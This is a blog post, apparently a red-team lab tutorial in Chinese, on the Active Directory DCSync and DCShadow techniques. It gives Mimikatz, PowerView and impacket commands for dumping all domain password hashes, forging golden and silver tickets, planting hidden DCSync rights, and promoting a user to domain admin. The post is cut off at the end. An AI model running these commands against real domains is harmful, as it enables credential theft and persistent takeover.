{"id":100,"date":"2022-08-25T23:05:32","date_gmt":"2022-08-25T15:05:32","guid":{"rendered":"https:\/\/www.hm-zy.cn\/?p=100"},"modified":"2025-04-03T10:39:07","modified_gmt":"2025-04-03T02:39:07","slug":"dcsyncdcshadow","status":"publish","type":"post","link":"https:\/\/www.hm-zy.cn\/?p=100","title":{"rendered":"DCSync&#038;DCshadow\u539f\u7406\u4e0e\u5e94\u7528"},"content":{"rendered":"<h1>DCSync<\/h1>\n<h2>\u539f\u7406<\/h2>\n<p>\u5728\u57df\u73af\u5883\u4e2d\uff0c\u4e0d\u540c\u57df\u63a7\u5236\u5668\uff08DC\uff09\u4e4b\u95f4\uff0c\u6bcf 15 \u5206\u949f\u90fd\u4f1a\u6709\u4e00\u6b21\u57df\u6570\u636e\u7684\u540c\u6b65\u3002\u5f53\u4e00\u4e2a\u57df\u63a7\u5236\u5668\uff08DC 1\uff09\u60f3\u4ece\u5176\u4ed6\u57df\u63a7\u5236\u5668\uff08DC 2\uff09\u83b7\u53d6\u6570\u636e\u65f6\uff0cDC 1 \u4f1a\u5411 DC 2 \u53d1\u8d77\u4e00\u4e2a GetNCChanges \u8bf7\u6c42\uff0c\u8be5\u8bf7\u6c42\u7684\u6570\u636e\u5305\u62ec\u9700\u8981\u540c\u6b65\u7684\u6570\u636e\u3002\u5982\u679c\u9700\u8981\u540c\u6b65\u7684\u6570\u636e\u6bd4\u8f83\u591a\uff0c\u5219\u4f1a\u91cd\u590d\u4e0a\u8ff0\u8fc7\u7a0b\u3002DCSync \u5c31\u662f\u5229\u7528\u7684\u8fd9\u4e2a\u539f\u7406\uff0c\u901a\u8fc7 Directory Replication Service\uff08DRS\uff09 \u670d\u52a1\u7684 GetNCChanges \u63a5\u53e3\u5411\u57df\u63a7\u53d1\u8d77\u6570\u636e\u540c\u6b65\u8bf7\u6c42\u3002<\/p>\n<p>DCSync \u662f\u57df\u6e17\u900f\u4e2d\u7ecf\u5e38\u4f1a\u7528\u5230\u7684\u6280\u672f\uff0c\u5176\u88ab\u6574\u5408\u5728\u4e86 Mimikatz \u4e2d\u3002\u5728 DCSync \u529f\u80fd\u51fa\u73b0\u4e4b\u524d\uff0c\u8981\u60f3\u83b7\u5f97\u57df\u7528\u6237\u7684\u54c8\u5e0c\uff0c\u9700\u8981\u767b\u5f55\u57df\u63a7\u5236\u5668\uff0c\u5728\u57df\u63a7\u5236\u5668\u4e0a\u6267\u884c\u4ee3\u7801\u624d\u80fd\u83b7\u5f97\u57df\u7528\u6237\u7684\u54c8\u5e0c\u3002<\/p>\n<p>2015 \u5e74 8 \u6708\uff0cBenjamin Delpy\uff08\u795e\u5668 Mimikatz \u7684\u4f5c\u8005\uff09\u548c Vincent Le Toux \u53d1\u5e03\u4e86\u65b0\u7248\u672c\u7684 Mimikatz\uff0c\u65b0\u589e\u52a0\u4e86 DCSync \u529f\u80fd\u3002\u8be5\u529f\u80fd\u53ef\u4ee5\u6a21\u4eff\u4e00\u4e2a\u57df\u63a7\u5236\u5668\uff0c\u4ece\u771f\u5b9e\u7684\u57df\u63a7\u5236\u5668\u4e2d\u8bf7\u6c42\u6570\u636e\uff0c\u4f8b\u5982\u7528\u6237\u7684\u54c8\u5e0c\u3002\u8be5\u529f\u80fd\u6700\u5927\u7684\u7279\u70b9\u5c31\u662f\u4e0d\u7528\u767b\u9646\u57df\u63a7\u5236\u5668\uff0c\u5373\u53ef\u8fdc\u7a0b\u901a\u8fc7\u57df\u6570\u636e\u540c\u6b65\u590d\u5236\u7684\u65b9\u5f0f\u83b7\u5f97\u57df\u63a7\u5236\u5668\u4e0a\u7684\u7684\u6570\u636e\u3002<\/p>\n<p>\u5728\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c\u53ea\u6709 Administrators\u3001Domain Controllers \u548c Enterprise Domain Admins \u7ec4\u5185\u7684\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528 DCSync\uff0c\u4f46\u6211\u4eec\u53ef\u4ee5\u5bf9\u57df\u5185\u666e\u901a\u7528\u6237\u6dfb\u52a0 ACL (Access Control List) \u5b9e\u73b0\u666e\u901a\u7528\u6237\u4e5f\u80fd\u8c03\u7528 DCSync \u529f\u80fd\u3002<\/p>\n<p><strong>\u6ce8\u610f\uff1aDCSync \u653b\u51fb\u7684\u5bf9\u8c61\u5982\u679c\u662f\u53ea\u8bfb\u57df\u63a7\u5236\u5668 (RODC)\uff0c\u5219\u4f1a\u5931\u6548\uff0c\u56e0\u4e3a RODC \u662f\u4e0d\u80fd\u53c2\u4e0e\u590d\u5236\u540c\u6b65\u6570\u636e\u5230\u5176\u4ed6 DC \u7684\u3002<\/strong><\/p>\n<p>DCSync\u6700\u5f3a\u5927\u7684\u529f\u80fd\u662f\u4e0d\u7528\u767b\u5f55\u57df\u63a7\uff0c\u5373\u53ef\u901a\u8fc7\u6570\u636e\u540c\u6b65\u7684\u65b9\u5f0f\u8fdc\u7a0b\u83b7\u53d6\u6307\u5b9a\u7528\u6237\u7684\u5bc6\u7801\u4fe1\u606f\u3002\u4f46\u662fDCSync \u653b\u51fb\u7684\u5bf9\u8c61\u5982\u679c\u662fRODC\u57df\u63a7\u5236\u5668\uff08\u53ea\u8bfb\u57df\u63a7\u5236\u5668\uff09\uff0c\u5219\u4f1a\u5931\u6548\uff0c\u56e0\u4e3aRODC\u4e0e\u53ef\u8bfb\u5199\u57df\u63a7\u5236\u5668\u4e4b\u95f4\u662f\u7684\u590d\u5236\u662f\u5355\u5411\u590d\u5236\u65e0\u6cd5\u8bf7\u6c42\u540c\u6b65\u6570\u636e\u3002<\/p>\n<h2>\u524d\u7f6e<\/h2>\n<p>\u83b7\u5f97\u4ee5\u4e0b\u4efb\u610f\u6743\u9650<\/p>\n<ul>\n<li>Administrators\u7ec4\u5185\u7684\u7528\u6237<\/li>\n<li>Domain Admins\u7ec4\u5185\u7684\u7528\u6237<\/li>\n<li>Enterprise Admins\u7ec4\u5185\u7684\u7528\u6237<\/li>\n<li>\u57df\u63a7\u5236\u5668\u7684\u8ba1\u7b97\u673a\u5e10\u6237<\/li>\n<\/ul>\n<p>\u5373\uff1a\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u57df\u7ba1\u7406\u5458\u7ec4\u5177\u6709\u8be5\u6743\u9650<\/p>\n<p>\u6216\u8005\u5411\u57df\u5185\u7684\u4e00\u4e2a\u666e\u901a\u7528\u6237\u6dfb\u52a0\u5982\u4e0b\u4e09\u6761ACE\uff08Access Control Entries\uff0c\u8bbf\u95ee\u63a7\u5236\u6761\u76ee\uff09\uff1a<\/p>\n<pre><code>DS-Replication-Get-Changes(GUID:1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)\n\nDS-Replication-Get-Changes-All(GUID:1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)\n\nDS-Replication-Get-Changes(GUID:89e95b76-444d-4c62-991a-0facbeda640c)<\/code><\/pre>\n<p>\u8be5\u7528\u6237\u5373\u53ef\u83b7\u5f97\u5229\u7528DCSync\u5bfc\u51fa\u57df\u5185\u6240\u6709\u7528\u6237hash\u7684\u6743\u9650\u3002<\/p>\n<h2>\u5229\u7528<\/h2>\n<h3>\u7b80\u5355\u5229\u7528<\/h3>\n<pre><code class=\"language-cmd\">#\u53ea\u83b7\u53d6\u5355\u4e2a\u7528\u6237hash\nlsadump::dcsync \/domain:redteam.local \/user:IT \/csv\n\n#\u83b7\u53d6\u5355\u4e2a\u7528\u6237\u51ed\u8bc1\nlsadump::dcsync \/domain:redteam.local \/user:IT\n\n#\u5bfc\u51fa\u57df\u5185\u6240\u6709\u7528\u6237hash\nlsadump::dcsync \/domain:redteam.local \/all \/csv<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/1.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/1.png\" alt=\"undefined\" \/><\/noscript><br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/2.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/2.png\" alt=\"undefined\" \/><\/noscript><br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/3.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/3.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h3>\u8fdb\u9636\u5229\u7528<\/h3>\n<h3>\u751f\u6210\u9ec4\u91d1\u7968\u636e<\/h3>\n<p>\u5bfc\u51fakrbtgt\u8d26\u6237hash<\/p>\n<pre><code class=\"language-cmd\">lsadump::dcsync \/domain:redteam.local \/user:krbtgt<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/4.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/4.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u4e4b\u540e\u5728win2008\u673a\u5668\u6ce8\u5165\u9ec4\u91d1\u7968\u636e<\/p>\n<pre><code class=\"language-cmd\">kerberos::golden \/user:administrator \/domain:redteam.local \/sid:S-1-5-21-3458133008-801623762-2841880732 \/krbtgt:c1fae0c27a40526e4ade2065d9646427 \/ptt<\/code><\/pre>\n<p>\u6210\u529f\u4e0e\u57df\u63a7\u5efa\u7acb\u8fde\u63a5<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/5.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/5.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h3>\u57df\u5185\u6743\u9650\u7ef4\u6301<\/h3>\n<p>\u5982\u524d\u6587\u6240\u8ff0\uff0c\u6211\u4eec\u5982\u679c\u8ba9\u666e\u901a\u57df\u7528\u6237\u83b7\u5f97\u4e86\u8bbf\u95ee\u63a7\u5236\u6761\u76ee\u5373\u53ef\u62e5\u6709DCSync\u6743\u9650\uff0c\u90a3\u4e48\u5c31\u76f8\u5f53\u4e8e\u8ba9\u666e\u901a\u57df\u7528\u6237\u6709\u4e86\u9690\u85cf\u7684\u57df\u7ba1\u6743\u9650<br \/>\n\u8fd9\u91cc\u6211\u4eec\u4f7f\u7528powerview\u6765\u5b9e\u73b0,\u7ed9\u666e\u901a\u57df\u7528\u6237DB\u6dfb\u52a0<\/p>\n<pre><code class=\"language-powershell\">Import-Module .\\PowerView.ps1\n\nAdd-DomainObjectAcl -TargetIdentity &quot;DC=redteam,DC=local&quot; -PrincipalIdentity DB -Rights DCSync -Verbose<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/6.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/6.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u4e4b\u540e\u7528DB\u7528\u6237\u6d4b\u8bd5<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/7.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/7.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u6210\u529f\u4f7f\u7528DCSync dumphash<br \/>\n\u4e4b\u540e\u8f93\u5165<\/p>\n<pre><code class=\"language-powershell\">Remove-DomainObjectAcl -TargetIdentity &quot;DC=redteam,DC=local&quot; -PrincipalIdentity whoami -Rights DCSync -Verbose<\/code><\/pre>\n<p>\u5373\u53ef\u5220\u9664\u6743\u9650<\/p>\n<h4>\u67e5\u627e\u5177\u6709 DCSync\u6743\u9650\u7684\u7528\u6237<\/h4>\n<p>\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528ADFind<\/p>\n<pre><code class=\"language-cmd\">AdFind.exe -s subtree -b &quot;DC=redteam,DC=local&quot; -sdna nTSecurityDescriptor -sddl+++ -sddlfilter ;;;&quot;Replicating Directory Changes&quot;;; -recmute<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/8.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/8.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u4e4b\u540e\u6211\u4eec\u5220\u9664\u518d\u6b21\u91cd\u65b0\u5bfb\u627e,\u53d1\u73b0DB\u8d26\u6237\u7684\u6743\u9650\u6210\u529f\u5220\u9664<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/9.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/9.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h2>\u4f7f\u7528MachineAccount\u5b9e\u73b0DCSync<\/h2>\n<p>MachineAccount\u662f\u6bcf\u53f0\u8ba1\u7b97\u673a\u5728\u5b89\u88c5\u7cfb\u7edf\u540e\u9ed8\u8ba4\u751f\u6210\u7684\u8ba1\u7b97\u673a\u5e10\u6237<\/p>\n<p>\u5982\u679c\u8ba1\u7b97\u673a\u52a0\u5165\u57df\u4e2d\uff0c\u4f1a\u5c06\u8ba1\u7b97\u673a\u5e10\u6237\u7684\u5bc6\u7801\u540c\u6b65\u5230\u57df\u63a7\u5236\u5668\u5e76\u4fdd\u5b58\u5728\u57df\u63a7\u5236\u5668\u7684NTDS.dit\u6587\u4ef6\u4e2d<\/p>\n<p>\u8ba1\u7b97\u673a\u5e10\u6237\u7684\u5bc6\u7801\u9ed8\u8ba4\u6bcf30\u5929\u81ea\u52a8\u66f4\u65b0\uff0c\u5bc6\u7801\u957f\u5ea6\u4e3a120\u4e2a\u5b57\u7b26\uff0c\u6240\u4ee5\u8bf4\uff0c\u5373\u4f7f\u83b7\u5f97\u4e86\u8ba1\u7b97\u673a\u5e10\u6237\u5bc6\u7801\u7684hash\uff0c\u4e5f\u5f88\u96be\u8fd8\u539f\u51fa\u8ba1\u7b97\u673a\u5e10\u6237\u7684\u660e\u6587\u53e3\u4ee4<\/p>\n<p>\u8ba1\u7b97\u673a\u5e10\u6237\u7684\u5bc6\u7801\u5b58\u50a8\u5728\u6ce8\u518c\u8868\u4e2d\u7684\u4f4d\u7f6e\u4e3a\uff1a<\/p>\n<pre><code class=\"language-cmd\">HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets\\$machine.ACC  \n# \u8be5\u6ce8\u518c\u8868\u952e\u8def\u5f84\u53ea\u80fd\u5728 SYSTEM \u6743\u9650\u4e0b\u8bbf\u95ee<\/code><\/pre>\n<h4>\u5229\u7528<\/h4>\n<p>\u56e0\u4e3a\u767d\u94f6\u7968\u636e\u6ce8\u5165\u662f\u9700\u8981MachineAccount\u8d26\u6237\u7684hash\u7684\uff0c\u6240\u4ee5\u4e0b\u4e00\u6b65\u6211\u4eec\u4f7f\u7528\u767d\u94f6\u7968\u636e\u6d4b\u8bd5<br \/>\n\u5148\u6d4b\u8bd5\u4e0b\u5220\u9664DCSync\u6743\u9650\u7684\u60c5\u51b5<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/10.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/10.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u55ef\uff0c\u6ca1\u6709\u6743\u9650<br \/>\n\u4e4b\u540e\u6211\u4eec\u6ce8\u5165\u767d\u94f6\u7968\u636e(\u8fd9\u91cc\u7684\u670d\u52a1\u53ef\u4ee5\u6ce8\u5165ldap\u670d\u52a1\uff0c\u6ce8\u5165\u673a\u5668hash\u4e3aDC)<\/p>\n<pre><code class=\"language-cmd\">kerberos::golden \/domain:redteam.local \/sid:S-1-5-21-3458133008-801623762-2841880732 \/target:DC.redteam.local \/service:LDAP \/rc4:d0bcb64fc54fedf6adc2a53d78dcdec6 \/user:krbtgt \/ptt<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/11.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/11.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u6210\u529f\u5229\u7528\u767d\u94f6\u7968\u636edumphash<br \/>\n\u540c\u65f6\u9ec4\u91d1\u7968\u636e\u4e5f\u6d4b\u8bd5\u6210\u529f<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/12.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/12.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h4>\u6269\u5c55<\/h4>\n<p>\u66f4\u591a\u7684\u6211\u4eec\u53ef\u4ee5impacket\u5305\u7684secretsdump\u6765\u8fdc\u7a0b\u5229\u7528<\/p>\n<pre><code class=\"language-cmd\">1.secretsdump\u652f\u6301\u4ece\u57df\u5916\u7684\u8ba1\u7b97\u673a\u8fde\u63a5\u81f3\u57df\u63a7\u5236\u5668\n2.\u5982\u679c\u4f7f\u7528\u57df\u5185\u666e\u901a\u8ba1\u7b97\u673a\u5e10\u6237\u7684\u53e3\u4ee4hash\u8fde\u63a5\u5bf9\u5e94\u7684\u8ba1\u7b97\u673a\uff0c\u90a3\u4e48\u4f1a\u5931\u8d25\uff0c\u63d0\u793arpc_s_access_denied<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u901a\u8fc7 wmiexec.py \u6216smbexec.py\u8fdc\u7a0b\u6267\u884ccmd\u547d\u4ee4 \uff08winserver2016\u5df2\u7ecf\u4e0d\u80fd\u7528\u673a\u5668\u8d26\u6237\u8fdb\u884c\u8ba4\u8bc1\u767b\u9646\uff09<\/p>\n<pre><code class=\"language-cmd\">python smbexec.py -hashes:7da530fba3b15a2ea21ce7db8110d57b test\/DC1$@192.168.1.1 whoami \/priv\npython wmiexec.py -hashes:7da530fba3b15a2ea21ce7db8110d57b test\/DC1$@192.168.1.1 whoami \/priv<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u7528powershell\u811a\u672chttps:\/\/gist.github.com\/monoxgas\/9d238accd969550136db<\/p>\n<p>\u901a\u8fc7Invoke-ReflectivePEinjection\u8c03\u7528mimikatz.dll\u4e2d\u7684dcsync\u529f\u80fd<\/p>\n<p>\u5bfc\u51fa\u57df\u5185administrator\u5e10\u6237\u7684hash\uff1a<\/p>\n<pre><code>Invoke-DCSync -DumpForest -Users @(&quot;administrator&quot;) | ft -wrap -autosize<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/13.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/13.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<p>\u5bfc\u51fa\u57df\u5185\u6240\u6709\u7528\u6237\u7684hash\uff1a<\/p>\n<pre><code>Invoke-DCSync -DumpForest | ft -wrap -autosize<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/14.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/14.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h2>DCshadow<\/h2>\n<h2>\u539f\u7406<\/h2>\n<p>Mimikatz\u8fdc\u7a0b\u4eceDC\u4e2d\u590d\u5236\u6570\u636e\uff0c\u5373Dcsync; \u7c7b\u4f3c\u7684dcshadow\u53ef\u4ee5\u4f2a\u88c5\u6210DC\uff0c\u8ba9\u6b63\u5e38DC\u901a\u8fc7\u4f2a\u9020\u7684DC\u4e2d\u590d\u5236\u6570\u636e\u3002<\/p>\n<h2>\u6b65\u9aa4<\/h2>\n<p>1\u3001\u901a\u8fc7dcshadow\u66f4\u6539\u914d\u7f6e\u67b6\u6784\u548c\u6ce8\u518cSPN\u503c\uff0c\u5c06\u6211\u4eec\u7684\u670d\u52a1\u5668\u6ce8\u518c\u4e3aActive Directory\u4e2d\u7684DC<br \/>\n2\u3001\u5728\u6211\u4eec\u4f2a\u9020\u7684DC\u4e0a\u66f4\u6539\u6570\u636e\uff0c\u5e76\u5229\u7528\u57df\u590d\u5236\u5c06\u6570\u636e\u540c\u6b65\u5230\u6b63\u5e38DC\u4e0a\u3002  <\/p>\n<p>\u4ece\u539f\u7406\u4e2d\u6211\u4eec\u53ef\u4ee5\u8ba4\u8bc6\u5230\u4e24\u70b9\uff1a<br \/>\n1\u3001\u9700\u8981\u5177\u5907\u57df\u7ba1\u6743\u9650\u6216\u57df\u63a7\u672c\u5730\u7ba1\u7406\u6743\u9650\uff0c\u6ce8\u518cspn\u503c\uff0c\u5199\u6743\u9650\u7b49<br \/>\n2\u3001\u9664\u4e86dc\u4e4b\u95f4\u7684\u8fde\u63a5\u901a\u4fe1\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u4e0d\u4f1a\u8bb0\u5f55\u4e8b\u4ef6\u65e5\u5fd7<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/15.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/15.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h2>\u524d\u7f6e<\/h2>\n<p>\u57df\u63a7\u65b0\u521b\u4e00\u4e2a\u6d4b\u8bd5\u57df\u666e\u901a\u7528\u6237lh<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/16.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/16.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u8d77\u4e00\u4e2asystem\u7684\u8fdb\u7a0b<\/p>\n<pre><code class=\"language-cmd\">!+\n!processtoken\ntoken::whoami<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/17.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/17.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u65b0\u8d77\u4e00\u4e2a\u57df\u7ba1cmd\u7a97\u53e3<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/18.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/18.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h2>\u653b\u51fb<\/h2>\n<p>system\u6267\u884c,\u66f4\u6539\u63cf\u8ff0\u7b26<\/p>\n<pre><code class=\"language-cmd\">lsadump::dcshadow \/object:CN=lh,CN=Users,DC=redteam,DC=local \/attribute:description    \/value:&quot;test successfully&quot;<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/19.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/19.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u4e4b\u540e\u57df\u7ba1\u6267\u884cpush<\/p>\n<pre><code class=\"language-cmd\">lsadump::dcshadow \/push<\/code><\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/20.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/20.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u63a8\u9001\u5237\u65b0\u6210\u529f\uff0c\u5728\u57df\u63a7\u67e5\u770b\u53d1\u73b0\u6253\u6210\u529f\u4e86<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/21.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/21.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h4>\u6dfb\u52a0\u57df\u7ba1<\/h4>\n<p>\u67e5\u770b\u672c\u5730\u57df\u7ba1<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/22.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/22.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<pre><code class=\"language-cmd\">lsadump::dcshadow \/object:CN=lh,CN=Users,DC=redteam,DC=local \/attribute:primarygroupid \/value:512<\/code><\/pre>\n<p>\u53d1\u9001\u6211\u4eec\u7684payload\u5e76\u4e14\u63a8\u9001<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/23.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/23.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u518d\u6b21\u67e5\u770b\u57df\u7ba1<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/24.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><br \/>\n<noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/24.png\" alt=\"undefined\" \/><\/noscript><br \/>\n\u524d\u540e\u5bf9\u6bd4<br \/>\n<img decoding=\"async\" data-original=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/25.png\" src=\"https:\/\/www.hm-zy.cn\/wp-content\/themes\/solome\/assets\/img\/loading.gif\" alt=\"undefined\" \/><\/p>\n<p><noscript><img decoding=\"async\" src=\"https:\/\/pt.hm-zy.cn\/DCSync%26DCshadow\/25.png\" alt=\"undefined\" \/><\/p>\n<p><\/noscript><\/p>\n<h4>\u6dfb\u52a0sid 